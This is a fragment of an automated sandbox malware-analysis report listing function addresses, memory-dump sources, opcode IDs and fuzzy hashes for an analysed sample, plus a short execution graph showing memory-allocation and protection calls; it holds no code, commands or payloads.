                                        Function 00007FFD9BAFC1F0 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c83f2794ff9070700c77329b7516756ea1c6f7139f57db45ce32e4a588b9f0dd
                                        • Instruction ID: 0106c64331c9c2ceb7b910ffd08938f7a506a134a20fac537d88c3b60cdf40e9
                                        • Opcode Fuzzy Hash: c83f2794ff9070700c77329b7516756ea1c6f7139f57db45ce32e4a588b9f0dd
                                        • Instruction Fuzzy Hash: 89F0E730914A4D9FCF84EF58C859AEA7BF0FB68305F0041AAA80DD3260DB31E694CB81
                                        Function 00007FFD9BAEDBC0 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 15cccd002fe93da006191b32392443fc37dd25bd53bb16ca8c289a27feec90e2
                                        • Instruction ID: 397ea966f0880415f6ad377e37b4f8811d63d38468275db4d30e00321b4b0812
                                        • Opcode Fuzzy Hash: 15cccd002fe93da006191b32392443fc37dd25bd53bb16ca8c289a27feec90e2
                                        • Instruction Fuzzy Hash: 69F0EC30914A4D9FCF44EF58C859AE97BF0FF68305F00456AA80DD3260DB30E594CB81
                                        Function 00007FFD9BAF3620 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33622e42abbb3bfd61dc999bdca2882b6a4df3b016b3e85fbe29af27d9465a9a
                                        • Instruction ID: fe6e13d909a83838e6ea32e17c11563a7550af0841553bf0d3e463061398ad18
                                        • Opcode Fuzzy Hash: 33622e42abbb3bfd61dc999bdca2882b6a4df3b016b3e85fbe29af27d9465a9a
                                        • Instruction Fuzzy Hash: 68F0EC30A1490DCFCF84EF58C848AEE77F0FB68304F00056AA41DD3250DB709654CB80
                                        Function 00007FFD9BAEB610 Relevance: .0, Instructions: 35COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c1c80a8bf99777f9a2fedd5cc3e3d5a66ba5266b7e42ff36eebc591cf4d51ff6
                                        • Instruction ID: ab58d17d0fe92d09338d4786c1564ee7630c3b4c32da37c8895c4af7b1a5acb4
                                        • Opcode Fuzzy Hash: c1c80a8bf99777f9a2fedd5cc3e3d5a66ba5266b7e42ff36eebc591cf4d51ff6
                                        • Instruction Fuzzy Hash: 8DF0BD3091494D9FDF84EF58C499AAA7BF1FB68305F5041AAE41DD31A0DB719694CB80
                                        Function 00007FFD9BAF2428 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0dff646c59fe16cf3a7c2ef7284b723d3e5ca84030295b61076a434b55affdab
                                        • Instruction ID: 630a63dfd972361e6dd9d5cbaaf61ef29bea959d8bf87355eb1aabc7dc09d830
                                        • Opcode Fuzzy Hash: 0dff646c59fe16cf3a7c2ef7284b723d3e5ca84030295b61076a434b55affdab
                                        • Instruction Fuzzy Hash: AAF0BD30A14A4D9FDF94EF58C454AEA7BF0FF58305F1041AAE41DD3260DB71A694CB80
                                        Function 00007FFD9BAC0C81 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 482d09b28e21f12297fb4d0cbc8e850ffaa53d0c8d3426d3ad53b54a474038cc
                                        • Instruction ID: de3c57a3be32430725cbf53a0453263244cfdfd841709a9e883c941f01d5dd72
                                        • Opcode Fuzzy Hash: 482d09b28e21f12297fb4d0cbc8e850ffaa53d0c8d3426d3ad53b54a474038cc
                                        • Instruction Fuzzy Hash: F8011271E0855E8BEB68EF44C4655BE7BB1EF54714F00063AD416D72A1CF7859418B84
                                        Function 00007FFD9BAB838D Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4aa81d6c61054553668d0465cdfced2040cf85260254b25950c04850dd12a0b8
                                        • Instruction ID: 5c454d106c3cda2c5d1b3fb9dfb0fe57277b8ec5704fc4905653712b3c38c802
                                        • Opcode Fuzzy Hash: 4aa81d6c61054553668d0465cdfced2040cf85260254b25950c04850dd12a0b8
                                        • Instruction Fuzzy Hash: 25F09A31509A8DCFCB90EF5CC895A9A3BE0FF69310F0501AAE52CC71A2D775E964CB81
                                        Function 00007FFD9BAB8BAD Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93e9c56147de61e09a9b5a47cc0af4bad7b656cec28b63d6173d1e0643e35049
                                        • Instruction ID: 9480e911159c0fc85639596cc6e8fe94fdff4c958600b2755d7ff8b5f3a2e116
                                        • Opcode Fuzzy Hash: 93e9c56147de61e09a9b5a47cc0af4bad7b656cec28b63d6173d1e0643e35049
                                        • Instruction Fuzzy Hash: DBF0903090968DCFCB94EF18C8656993BE0FF69310F0501A6E418C7161D774D960CB81
                                        Function 00007FFD9BAFCA10 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9af627059f82f3f9c41985f809b605fbb0d6c4b1c12e934007bbdc171c008f53
                                        • Instruction ID: 96884af26834d441bdaf0eff22005f158f0814284127834f2657edc9685d2275
                                        • Opcode Fuzzy Hash: 9af627059f82f3f9c41985f809b605fbb0d6c4b1c12e934007bbdc171c008f53
                                        • Instruction Fuzzy Hash: DCE06871A09B4C4FDB60EB599820AD47BA0FBC9304F04106AE00CC6290D6266944C341
                                        Function 00007FFD9BAA0CCF Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c6d6ae5d11906e0421b023ae1f80a1923874547a2f5ec7e5592f744573b5a432
                                        • Instruction ID: ced7ed4814c8185e13bcee077fa022dc4f7ff80f5f3d52a59f846fed007aad68
                                        • Opcode Fuzzy Hash: c6d6ae5d11906e0421b023ae1f80a1923874547a2f5ec7e5592f744573b5a432
                                        • Instruction Fuzzy Hash: 39F06270B0A61A8BE768DF94C8946FD73B2BF55711F04067AD01D922E2CBB86640CB55
                                        Function 00007FFD9BAB81ED Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 46cb20a11bfe9d75c5429aeceb9f29105520563386e2456566f00e531b6503ab
                                        • Instruction ID: 098a65f9b47936728651a370b6f4e8de1a03d488ab037d05c3ff36bd0c59f5d9
                                        • Opcode Fuzzy Hash: 46cb20a11bfe9d75c5429aeceb9f29105520563386e2456566f00e531b6503ab
                                        • Instruction Fuzzy Hash: B1F08C3184D68C9FDB51AB68885D6987FA0EF15311F1504EBD818C60A1DA349254CB01
                                        Function 00007FFD9BAC4053 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc960756847011f46dc36691ebb9bf00d64170701a821e79703c128533db9791
                                        • Instruction ID: cf872cfedb85781231633e63d4bf17496d6efdc4381d4103571b2efb6e5aa414
                                        • Opcode Fuzzy Hash: dc960756847011f46dc36691ebb9bf00d64170701a821e79703c128533db9791
                                        • Instruction Fuzzy Hash: E6E06531F0A51D4FE7A4EB88C8712FD32A2EF99340F814175E41E972E2CD762A418B40
                                        Function 00007FFD9BAC19ED Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8bc95f78c279d735a495a1dd9b4c18142486d2ddc50111bd4a96b8a9533eb6fa
                                        • Instruction ID: 2f1b9ff46708b12732a2b43872c50fd887aefb8acbb8535ae55448ab5000a9c0
                                        • Opcode Fuzzy Hash: 8bc95f78c279d735a495a1dd9b4c18142486d2ddc50111bd4a96b8a9533eb6fa
                                        • Instruction Fuzzy Hash: F3F07070F5E11D8AEB74ABF584557BC76B09F25301F71007AD00D931A2DE7856809F00
                                        Function 00007FFD9BAA6B59 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c2d8bf603f1ff3962be9e2841edff13bd36c87b6a4bb994ff247695d1b53e42
                                        • Instruction ID: fc9c2ca018d1ae3e38e0e8cc1e12ebcfb326bded0cc19542ceaccd9cbf1d9c4a
                                        • Opcode Fuzzy Hash: 2c2d8bf603f1ff3962be9e2841edff13bd36c87b6a4bb994ff247695d1b53e42
                                        • Instruction Fuzzy Hash: 4AE0EC31E2966C89EBA9DB20C855AEDB3B2EF54301F4545FB800EB2595DEB46B858F00
                                        Function 00007FFD9BAA70E6 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b1f39765e7d85f5bd73d7ef8777b5c650a7ae58c5aed8193e7864bc75718315
                                        • Instruction ID: cd62c3e12d236e361688b6287dc5b3c2067a81a682d38567e014dd985994d6a6
                                        • Opcode Fuzzy Hash: 1b1f39765e7d85f5bd73d7ef8777b5c650a7ae58c5aed8193e7864bc75718315
                                        • Instruction Fuzzy Hash: 3DE01270A0A51A8AFB349B54C8583ACB3B1EF85300F1040B8C10E633D1CE781A80CF15
                                        Function 00007FFD9BAEAD25 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07c30af0225afb63adc87a4d995097b46d365252ca870b0a35356bfd44ca77ae
                                        • Instruction ID: 9312bd0bcc4031ad26c6c4293a3f45537469036f2e70e6ab9b3e8b491bd3b449
                                        • Opcode Fuzzy Hash: 07c30af0225afb63adc87a4d995097b46d365252ca870b0a35356bfd44ca77ae
                                        • Instruction Fuzzy Hash: CFD01730A1960E8EDB60EB10C414BAEB271FF54304F4042A5900D97196CA386A818F81

                                        Non-executed Functions

                                        Function 00007FFD9BAE2731 Relevance: 5.1, Strings: 4, Instructions: 65COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bad8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4$R$T$a
                                        • API String ID: 0-2417396697
                                        • Opcode ID: c38d1eab5843fbdf17ffe801a7bfff8d9b6f2e7632a66c182ea73d0d0af95530
                                        • Instruction ID: 58af580e7da37eb537aef11628782f432d6bbabb739d617066e5b359c6ebd549
                                        • Opcode Fuzzy Hash: c38d1eab5843fbdf17ffe801a7bfff8d9b6f2e7632a66c182ea73d0d0af95530
                                        • Instruction Fuzzy Hash: B5213CB0E0966D8AEB64EF94C4A83FC77F1AF14314F144079C009A62A1DEB86A84CB10
                                        Function 00007FFD9BAF0DF9 Relevance: 5.0, Strings: 4, Instructions: 41COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: '$.$2$?
                                        • API String ID: 0-982240037
                                        • Opcode ID: eeb59e62bcb0b826051ab0098c86440af2a522faf7d64413b45508ee3f167f3f
                                        • Instruction ID: 577cfd3807455f21a8e4056da56ddcff2cd09ca5179b7b424269b66fdeac558f
                                        • Opcode Fuzzy Hash: eeb59e62bcb0b826051ab0098c86440af2a522faf7d64413b45508ee3f167f3f
                                        • Instruction Fuzzy Hash: C5110630A4921ACAE7B5DF54C8987A877F5EB11701F1181FAC40DA72A1DFB86AC8CF01

                                        Execution Graph

                                        Execution Coverage:3.3%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:7
                                        Total number of Limit Nodes:1
                                        execution_graph 32186 7ffd9bab3b4d 32187 7ffd9bab3b22 32186->32187 32188 7ffd9bab3b6b VirtualAlloc 32186->32188 32190 7ffd9bab3c85 32188->32190 32182 7ffd9bab215e 32183 7ffd9bab216d VirtualProtect 32182->32183 32185 7ffd9bab22ad 32183->32185

                                        Executed Functions

                                        Function 00007FFD9BAEA4C7 Relevance: .4, Instructions: 406COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b0e4975936a809ae08d4dab7e44cd10804b633c1fc3adab5b4fe34618815c6eb
                                        • Instruction ID: 376a24c9db36ade2ca2a71da5bf5c727d013297a533f08f50249dba2bd553623
                                        • Opcode Fuzzy Hash: b0e4975936a809ae08d4dab7e44cd10804b633c1fc3adab5b4fe34618815c6eb
                                        • Instruction Fuzzy Hash: 2D02F770E0421D8FDB18DFA8C4A19EDFBB1FF48304F148569D41AAB25ADB34A985CF54
                                        Function 00007FFD9BAF31B5 Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,$4
                                        • API String ID: 0-508195717
                                        • Opcode ID: 4985ef3e85a3bb6403968fd1f6ba02c12a432853adf08e894753a5b4c2089844
                                        • Instruction ID: fb91ce7af5f18deab48a3ed39dc454ca76874416f6a5efefad9df1d5c834724b
                                        • Opcode Fuzzy Hash: 4985ef3e85a3bb6403968fd1f6ba02c12a432853adf08e894753a5b4c2089844
                                        • Instruction Fuzzy Hash: 42412870A0964DCFDB64DF94C8A4BE9BBF1EF58314F1141AAC04A972A1DB74AA85CF00
                                        Function 00007FFD9BAF3EC0 Relevance: 1.7, Strings: 1, Instructions: 488COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: 61a6cbf40b73c00847830904718e2071fd8e3daf4be30fb9a5c8e1c07610e69d
                                        • Instruction ID: af876abd23c06f3141cce28c850d529954f2a1329b540713e95a949f7110937d
                                        • Opcode Fuzzy Hash: 61a6cbf40b73c00847830904718e2071fd8e3daf4be30fb9a5c8e1c07610e69d
                                        • Instruction Fuzzy Hash: A4D10631B19E4E4FDBA8DB5C98A4AF537D2FF98314B0502BAD40DC7296DE28EC458340
                                        Function 00007FFD9BAB215E Relevance: 1.7, APIs: 1, Instructions: 192memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 7ffd9bab215e-7ffd9bab216b 399 7ffd9bab2176-7ffd9bab2187 398->399 400 7ffd9bab216d-7ffd9bab2175 398->400 401 7ffd9bab2189-7ffd9bab2191 399->401 402 7ffd9bab2192-7ffd9bab22ab VirtualProtect 399->402 400->399 401->402 407 7ffd9bab22ad 402->407 408 7ffd9bab22b3-7ffd9bab2303 402->408 407->408
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAAB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baab000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: a5e1f5290be3bf6a5e90ab962f78431ddc96f6343e1ad74f1f6f7a167a74393c
                                        • Instruction ID: a3a8d8865e590d5d3471f2f92529e77cfd9e00168a56ab10e557507077b19d1c
                                        • Opcode Fuzzy Hash: a5e1f5290be3bf6a5e90ab962f78431ddc96f6343e1ad74f1f6f7a167a74393c
                                        • Instruction Fuzzy Hash: 87517D70D0874D8FDB54DFA8D845AEDBBF1FB6A310F1042AAD048E7256DB74A885CB81
                                        Function 00007FFD9BAFC641 Relevance: 1.6, Strings: 1, Instructions: 371COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W
                                        • API String ID: 0-655174618
                                        • Opcode ID: afdd5343bc8a5c75bc8aaefee34eb70da4c605301d62b251783cdaf327bb898f
                                        • Instruction ID: f33fcc34a07a90a1c13e4f33019a61a820a249ae894cb647d78fdb251e3a2867
                                        • Opcode Fuzzy Hash: afdd5343bc8a5c75bc8aaefee34eb70da4c605301d62b251783cdaf327bb898f
                                        • Instruction Fuzzy Hash: 9AC13832B0EB8D4FDB64DB6898751ED7FE1EF99314F0901BAD088D72A3EE2859018351
                                        Function 00007FFD9BAB3B4D Relevance: 1.5, APIs: 1, Instructions: 212memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 475 7ffd9bab3b4d-7ffd9bab3b69 476 7ffd9bab3b6b-7ffd9bab3c83 VirtualAlloc 475->476 477 7ffd9bab3b22-7ffd9bab3b4a 475->477 483 7ffd9bab3c85 476->483 484 7ffd9bab3c8b-7ffd9bab3cef 476->484 483->484
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAAB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baab000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: bab02022056cf30fb71f95ac44541f2b08040488b88c6d1bbc824a9801636cfd
                                        • Instruction ID: 592cba376e88f55dea59d54cdcf2f654ec8b6529310f599bc19ed04e794c805f
                                        • Opcode Fuzzy Hash: bab02022056cf30fb71f95ac44541f2b08040488b88c6d1bbc824a9801636cfd
                                        • Instruction Fuzzy Hash: F1512930908A1C8FDF94EF98D885BE9BBF1FB69310F1041AAD00DE3255DB71A9858F80
                                        Function 00007FFD9BAFDD61 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: 58e459b42c8def36458a5a198364da886120b5d4aabbd1028bfb7a3bf5b0f993
                                        • Instruction ID: 3d32e18ca75a6824845d3e507878ea340d1cdddfd381a8b621f546d12d4a1cd5
                                        • Opcode Fuzzy Hash: 58e459b42c8def36458a5a198364da886120b5d4aabbd1028bfb7a3bf5b0f993
                                        • Instruction Fuzzy Hash: 61515C31B1EB8E0FEB9ADB6884656B97BE1FF94354B0005FAD05CCB1D7DE28A8048340
                                        Function 00007FFD9BAFDCBD Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A
                                        • API String ID: 0-3554254475
                                        • Opcode ID: d3932b0d3d001648d1f7acd64b552761c3594a29e254acebb161d338b8d62d77
                                        • Instruction ID: 9e6011293ed5d1b912f182030a75567d3a9099c2d862e98efb5af13a47ab616f
                                        • Opcode Fuzzy Hash: d3932b0d3d001648d1f7acd64b552761c3594a29e254acebb161d338b8d62d77
                                        • Instruction Fuzzy Hash: C6112622B1EF1E0BDFA8DA5C54682BA6BC1EB98221B0101BFE44DC32A5ED59AC014380
                                        Function 00007FFD9BAFC750 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W
                                        • API String ID: 0-655174618
                                        • Opcode ID: e210c1d6078d76b323f7f80a8aef11267e7c0eb4f25a77cfb602e3532870d21b
                                        • Instruction ID: c2b10477872b1ced0cb470b2ca5450738e25d499293f22aac88f899a8e57bed1
                                        • Opcode Fuzzy Hash: e210c1d6078d76b323f7f80a8aef11267e7c0eb4f25a77cfb602e3532870d21b
                                        • Instruction Fuzzy Hash: 6F11047161EBC95FE7558769D4202A67FE1EFC5250F0801BFE088C62E7DAADDA058342
                                        Function 00007FFD9BAF6219 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 623 7ffd9baf6219-7ffd9baf6257 624 7ffd9baf6259 623->624 625 7ffd9baf625e-7ffd9baf627a 623->625 624->625 626 7ffd9baf6280-7ffd9baf628d 625->626
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: 6b0ee83df71f54152e70d322329248de73e68887257b8643930e52a13bd8450e
                                        • Instruction ID: 1a3838d8456dcac49b6f7152c5fec1b23c5d37dbccb05f7809e6364e319b60c6
